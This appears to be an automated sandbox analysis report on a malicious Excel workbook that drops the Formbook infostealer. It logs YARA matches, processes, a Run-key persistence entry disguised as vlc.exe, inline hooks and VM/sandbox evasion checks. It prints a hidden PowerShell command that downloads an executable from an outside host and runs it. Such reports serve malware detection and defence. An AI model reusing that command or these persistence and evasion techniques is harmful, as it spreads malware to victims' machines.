          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: oftmhayq.exe.20.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vlc.exe.25.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine Classification label: mal100.troj.evad.winXLS@16/12@2/1
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_01
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{3E27D0C2-EB48-412A-8CE4-AD42CAD017F3} - OProcSessId.dat
          Source: 5901777.xls OLE indicator, Workbook stream: true
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Users\Public\oftmhayq.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: 5901777.xls Virustotal: Detection: 23%
          Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
          Source: unknown Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
          Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
          Source: unknown Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
          Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
          Source: C:\Users\Public\oftmhayq.exe Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
          Source: C:\Users\Public\oftmhayq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
          Source: Binary string: wntdll.pdbUGP source: oftmhayq.exe, 0000001D.00000002.535167655.00000000013CF000.00000040.00000001.sdmp, oftmhayq.exe, 0000001E.00000002.487705412.000000000141F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: oftmhayq.exe

          Data Obfuscation:

          Suspicious powershell command line found
          Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Source: initial sample Static PE information: section name: .text entropy: 7.97600028112

          Persistence and Installation Behavior:

          Creates processes via WMI
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\oftmhayq.exe
          Source: C:\Users\Public\oftmhayq.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\oftmhayq.exe
          Source: C:\Users\Public\oftmhayq.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN
          Source: C:\Users\Public\oftmhayq.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
          Source: C:\Users\Public\oftmhayq.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run vlc

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE0
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: 5901777.xlsStream path 'Workbook' entropy: 7.92744162749 (max. 8.0)

          Malware Analysis System Evasion:

          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: oftmhayq.exe, 00000018.00000002.468670038.0000000002BC9000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.467738260.0000000003439000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\oftmhayq.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\oftmhayq.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00409A90 rdtsc 29_2_00409A90
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\Public\oftmhayq.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3864
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3310
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5124
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3318
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744 Thread sleep count: 3864 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5388 Thread sleep count: 3310 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6120 Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1304 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5860 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5832 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6124 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584 Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4244 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exe TID: 5308 Thread sleep count: 39 > 30
          Source: C:\Users\Public\oftmhayq.exe TID: 4472 Thread sleep count: 63 > 30
          Source: C:\Users\Public\oftmhayq.exe TID: 2288 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\Public\oftmhayq.exe TID: 1012 Thread sleep count: 34 > 30
          Source: C:\Users\Public\oftmhayq.exe TID: 6576 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe TID: 4020 Thread sleep count: 59 > 30
          Source: C:\Users\Public\oftmhayq.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Windows\splwow64.exe Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000001F.00000000.510806745.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000014.00000002.442866575.000001D222633000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
          Source: oftmhayq.exe, 00000019.00000002.467738260.0000000003439000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: powershell.exe, 00000015.00000002.442626587.000001F6E4550000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000001F.00000000.501168197.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000001F.00000000.515471921.000000000F6C0000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&v
          Source: powershell.exe, 00000015.00000002.442626587.000001F6E4550000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000014.00000002.443094933.000001D222698000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
